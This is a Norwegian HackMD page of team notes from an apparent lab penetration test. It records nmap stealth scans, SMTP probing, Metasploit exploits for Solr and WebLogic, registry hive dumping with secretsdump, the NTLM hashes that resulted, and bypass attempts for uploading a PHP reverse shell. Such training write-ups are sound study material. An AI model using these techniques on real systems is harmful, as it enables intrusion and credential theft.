løsning å angripe den via en annen domeneijoinet maskin ## OPS: Finne åpne porter på domenekontroller * Kjører nmap med følgende kommando: * sudo nmap -sS 172.16.10.127 -T0 -v -p 53,88,135,445 * -sS er steath scan, få porter som ikke burde vekke mistanke * -T0 gir mye tid mellom requests for å ikke vekke mistanke * Resultat: ![](https://i.imgur.com/MvUHDZo.png) * Alle porter som ble scannet er åpne ## Veiledning Onsdag Ny info - flere nettverk del av scope. Tilbake til lytting og kartlegging - Ikke gå rett på domenekontroller, gå via en maskin som er på domenet - Alt i proving grounds er innafor, mulig man må - Gjøre OSINT på de andre bedriftene? Kanskje det finnes delte brukere eller andre lettere mål - Scan etter Windows porter på de andre maskinene? 3389? 445? ## Undersøkelse av Workstations * Ønsker å finne en vei videre til domenekontroller * Workstations ble oppdaget under passiv scanning * Sannsynlig at de kan gi en vei videre til DC * Må finne åpne porter for å undersøke muligheter for aksess * Nmap * Mulige interessante porter: * 135,445, 139, ## ProtoStar Scanning | IP | Åpne Porter | Info/Pakke | | -------- | -------- | -------- | | 172.16.11.18 | 445,3389 | RDP | | 172.16.11.19 | 80 | FusionPBX | | 172.16.11.20 | 21,25,135,139,445,3389,4130,8808 | | | 172.16.11.30 | 135,445 | | | 172.16.11.36 | 80,135,445 | IIS | | 172.16.11.40 | 80 | Gitlab | | 172.16.11.43 | 135,445,3389 | | | 172.16.11.44 | 135,445,3389 | | | 172.16.11.77 | 80 | Project Jade | | 172.16.11.171 | 80 | AlienVault OSSIM | | 172.16.11.182 | 80,445 | KodExplorer | ## 172.16.11.20 * Mange porter åpne, gir mange mulige inngangsvektorer * FTP, Samba shares, RDP * ## Slides: https://hackmd.io/slide-example?both https://hackmd.io/s/SyZdTi1ri ## Ops 11.20 (dione) poker ### Plan: Probe porter se headers. Lete etter relevante sårbarheter til disse. Prove RDP guest bruker ### Exec #### SMTP: Kjort `nc 172.16.11.20 25` `220 WIN-UBGTCRFMMK6 Microsoft ESMTP MAIL Service, Version: 10.0.14393.0 ready at Wed, 2 Nov 2022 04:24:46 -0700 ` https://www.darknet.org.uk/2008/03/hacking-windows-nt-through-iis-ftp/ Prøve å sende følgende kommando? * AUTH NTLM 334 * Hvis svar er "NTLM supported": * Send strengen TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= * Trigger challenge response fra serveren og avslører mye info om systemet * https://medium.com/swlh/internal-information-disclosure-using-hidden-ntlm-authentication-18de1767566* 6 * Utført, men NTLM autentisering er ikke tillatt på siden * "504 5.7.4 Unrecognized authentication type " * Forsøkt å enumerere brukere med: * VRFY root * 252 2.1.5 Cannot VRFY user, * EXPN root * 500 5.3.3 Unrecognized command * Ingen info blir avslørt #### FTP: Microsoft FTP Service Får logget inn som Anonymous og har skrivetilgang ### RDP: ### Samba shares: ## Analysis dione 1 ### Er dette IIS versjon? :`10.0.14393.0` XSS vulnerability ## OPS SOLR: Solr web interface pa http://172.16.11.20:4130/. Versjon er 8.2.0. **Metasploit tilgjengelig:** ``exploit(multi/http/solr_velocity_rce)`` ### Exploit: Utnytter noe URL-greier [CVE-2019-17558](https://nvd.nist.gov/vuln/detail/CVE-2019-17558). ### Plan: - Finne flaggfil "grep" i fil - host - Hente hash i SAM - Lete etter andre aksesspunkter - List ut C:\Users - Get-ADDomain -Current LoggedOnUser - Get-WmiObject -Namespace root\cimv2 -Class Win32_ComputerSystem | Select Name, Domain - NET USER (Lage ny bruker?) ### Exec: Siden hang seg opp - starter den pa nytt. Success! ![](https://i.imgur.com/cV8fmn9.png) ![](https://i.imgur.com/mhJVvKj.png) Flagg: * dione{23b29520567c50a3ca481cd607b4eeb3} ![](https://i.imgur.com/mABBcgq.png) Versjon: * Microsoft Windows [Version 10.0.14393] * ![](https://i.imgur.com/OodVMyY.png) ### Dumpe credentials * Mimikatz * Får ikke eksekvert på host * Dumper registre og forsøker å finne hasher lokalt * Administrator har Null-LM hash, men NTLM er satt * Forsøker å cracke med Hashcat ### OBSERVE: - Kan lage ny bruker? - Guest disabled - Har sysrettigheter ## 11.77 (pavonis) "Project Jade" kjører på port 80 Har en upload form: http://172.16.11.77/upload.php * Ment for upload av FASTA-format * https://en.wikipedia.org/wiki/FASTA_format Mulig å laste opp og aksessere en egen php fil? * Forsøkt å laste opp gyldig fasta fil med extension .fasta * Upload Failed * Fikk lastet opp filen ved å bruke filename fasta.txt * fasta.txt.php fungerer også * gjelder også fasta.php * Fikk lastet opp revshell ved å kalle det revshell.fasta lokalt men bruke filnavnet revshell.php under File Name i upload fanen * Må finne hvor revshellet ligger for å få det eksekvert * Ligger under /uploads * Filnavnet filen lagres med under /uploads er det originale navnet (revshell.fasta) * Å laste opp revshell.php med File Name revshell.fasta fungerer ikke * Revshell.fasta.php fungerer heller ikke * Har lastet opp filen revshell.fasta med File Name satt som revshell.fasta flere ganger * Får Upload Failed og Successful omtrent annen hver gang, usikker på hva som avgjør * Ser ut som PHP-filer ikke kan lastes opp * Får heller ikke lastet opp .sh filer * .php5 fungerer ikke * .php%20 fungerer ikke * .fasta.php%00 fungerer ikke * Forsøkt med intercept i BURP og endre navn på filene * Kommer til successful upload, men får fortsatt ikke plassert .php fil på serveren * Forsøkt med path traversal i uploaden med både burp og direkte i filnavnet * :( innholdet fasta filen: ``` FASTA DATA <?php ``` ## Poke 11.x ### 11.44 (spinon) Open ports, but no clear answers SMB pwd not working Kunne provd vilkarlig exploits, men for noisy? ### 11.91 (toliman) (Revert) Ran with -Pn No response at all ### 11.19 (triton) ``` PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http 443/tcp open https ``` ``` └─$ nc 172.16.11.19 25 220 triton ESMTP Exim 4.89 Wed, 02 Nov 2022 10:59:09 -0400 ``` Sjekke 80/443 Local Exploit: /CVE-2019-10149 exploit/linux/local/exim4_deliver_message_priv_esc #### WebExploit: Finner flere, men vet ikke versjon Moving on since not Windows. ## 11.23 Ulysses 9090: Fedora Server 22: ssh ## 11.42 Tharsis Kjorer :80 - sier moved til "WebLogic server" pa :7001/demo http :7001/demo kjorer Servlet/2.5 JSP/2.1 Forsoker a finne version til WebLogic server :80 kjorer Microsoft-IIS/10.0 Finner CVE-2019-2725 multi/misc/weblogic_deserialize_asyncresponseservice Plan: - Find flag - reg save HKLM\sam sam.save - reg save HKLM\system system.save - Download in meterpreter - `python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -system system.save` - Get hashes - List C:\Users - Check domain (NET DOMAIN) - Get-ADDomain -Current LoggedOnUser Results: 1. Flag: tharsis{9ac80954df4624d783c0747e5c2c2bdb} 2. Hashes ``` (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:eaa015f9288e6ced098536acca87d84b::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: weblogic:1000:aad3b435b51404eeaad3b435b51404ee:3d3c0ba2839535ab9fe5cbed7dae438e::: ``` 3. Domene ``` C:\Oracle\Middleware\user_projects\domains\water_domain>net VIEW net VIEW Server Name Remark ------------------------------------------------------------------------------- \\COMPUTADORA computadora server (Samba, Ubuntu) \\FILESERVER01 fileserver01 server (Samba, Ubuntu) \\LAND land server (Samba, Ubuntu) \\WEB The command completed successfully. ``` Lagde ny bruker med admin for a se litt rundt pa nettverkstilgang. ![](https://i.imgur.com/QGp63pH.png) # 14.115 Crow Port 80 åpen http://172.16.14.115/info.php eksisterer - Apache 2.4.37 Bruker Wordpress, kan se om vi finner wordpress exploits WPScan? # 11.10 Sycorax 22 og 2121 åpen 2121 er FTP proxy Får ikke logget inn med anonymous? # 11.182 Elara Fikk tips fra en samarbeidspartner. 182 kjører "KodExplorer" Default creds er guest/guest: https://github.com/kalcaddle/KodExplorer/blob/6d2521176eb662b5572fc961cc1bdda6ba310bcd/config/i18n/en/main.php Logger inn, kjører KodExplorer v4.25 Brukere: ![](https://i.imgur.com/yLb599I.png) 'pathInfo','pathList','treeList','pathChmod', 'mkdir','mkfile','pathRname','pathDelete','zip','unzip','unzipList', ## Hostnames |Hostname|ip| |--|--| |COMPUTADORA|172.16.11.66| |FILESERVER01|172.16.11.182|

    Import from clipboard

    Paste your markdown or webpage here...

    Advanced permission required

    Your current role can only read. Ask the system administrator to acquire write and comment permission.

    This team is disabled

    Sorry, this team is disabled. You can't edit this note.

    This note is locked

    Sorry, only owner can edit this note.

    Reach the limit

    Sorry, you've reached the max length this note can be.
    Please reduce the content or divide it to more notes, thank you!

    Import from Gist

    Import from Snippet

    or

    Export to Snippet

    Are you sure?

    Do you really want to delete this note?
    All users will lose their connection.

    Create a note from template

    Create a note from template

    Oops...
    This template has been removed or transferred.
    Upgrade
    All
    • All
    • Team
    No template.

    Create a template

    Upgrade

    Delete template

    Do you really want to delete this template?
    Turn this template into a regular note and keep its content, versions, and comments.

    This page need refresh

    You have an incompatible client version.
    Refresh to update.
    New version available!
    See releases notes here
    Refresh to enjoy new features.
    Your user state has changed.
    Refresh to load new user state.

    Sign in

    Forgot password

    or

    By clicking below, you agree to our terms of service.

    Sign in via Facebook Sign in via Twitter Sign in via GitHub Sign in via Dropbox Sign in with Wallet
    Wallet ( )
    Connect another wallet

    New to HackMD? Sign up

    Help

    • English
    • 中文
    • Français
    • Deutsch
    • 日本語
    • Español
    • Català
    • Ελληνικά
    • Português
    • italiano
    • Türkçe
    • Русский
    • Nederlands
    • hrvatski jezik
    • język polski
    • Українська
    • हिन्दी
    • svenska
    • Esperanto
    • dansk

    Documents

    Help & Tutorial

    How to use Book mode

    Slide Example

    API Docs

    Edit in VSCode

    Install browser extension

    Contacts

    Feedback

    Discord

    Send us email

    Resources

    Releases

    Pricing

    Blog

    Policy

    Terms

    Privacy

    Cheatsheet

    Syntax Example Reference
    # Header Header 基本排版
    - Unordered List
    • Unordered List
    1. Ordered List
    1. Ordered List
    - [ ] Todo List
    • Todo List
    > Blockquote
    Blockquote
    **Bold font** Bold font
    *Italics font* Italics font
    ~~Strikethrough~~ Strikethrough
    19^th^ 19th
    H~2~O H2O
    ++Inserted text++ Inserted text
    ==Marked text== Marked text
    [link text](https:// "title") Link
    ![image alt](https:// "title") Image
    `Code` Code 在筆記中貼入程式碼
    ```javascript
    var i = 0;
    ```
    var i = 0;
    :smile: :smile: Emoji list
    {%youtube youtube_id %} Externals
    $L^aT_eX$ LaTeX
    :::info
    This is a alert area.
    :::

    This is a alert area.

    Versions and GitHub Sync
    Get Full History Access

    • Edit version name
    • Delete

    revision author avatar     named on  

    More Less

    Note content is identical to the latest version.
    Compare
      Choose a version
      No search result
      Version not found
    Sign in to link this note to GitHub
    Learn more
    This note is not linked with GitHub
     

    Feedback

    Submission failed, please try again

    Thanks for your support.

    On a scale of 0-10, how likely is it that you would recommend HackMD to your friends, family or business associates?

    Please give us some advice and help us improve HackMD.

     

    Thanks for your feedback

    Remove version name

    Do you want to remove this version name and description?

    Transfer ownership

    Transfer to
      Warning: is a public team. If you transfer note to this team, everyone on the web can find and read this note.

        Link with GitHub

        Please authorize HackMD on GitHub
        • Please sign in to GitHub and install the HackMD app on your GitHub repo.
        • HackMD links with GitHub through a GitHub App. You can choose which repo to install our App.
        Learn more  Sign in to GitHub

        Push the note to GitHub Push to GitHub Pull a file from GitHub

          Authorize again
         

        Choose which file to push to

        Select repo
        Refresh Authorize more repos
        Select branch
        Select file
        Select branch
        Choose version(s) to push
        • Save a new version and push
        • Choose from existing versions
        Include title and tags
        Available push count

        Pull from GitHub

         
        File from GitHub
        File from HackMD

        GitHub Link Settings

        File linked

        Linked by
        File path
        Last synced branch
        Available push count

        Danger Zone

        Unlink
        You will no longer receive notification when GitHub file changes after unlink.

        Syncing

        Push failed

        Push successfully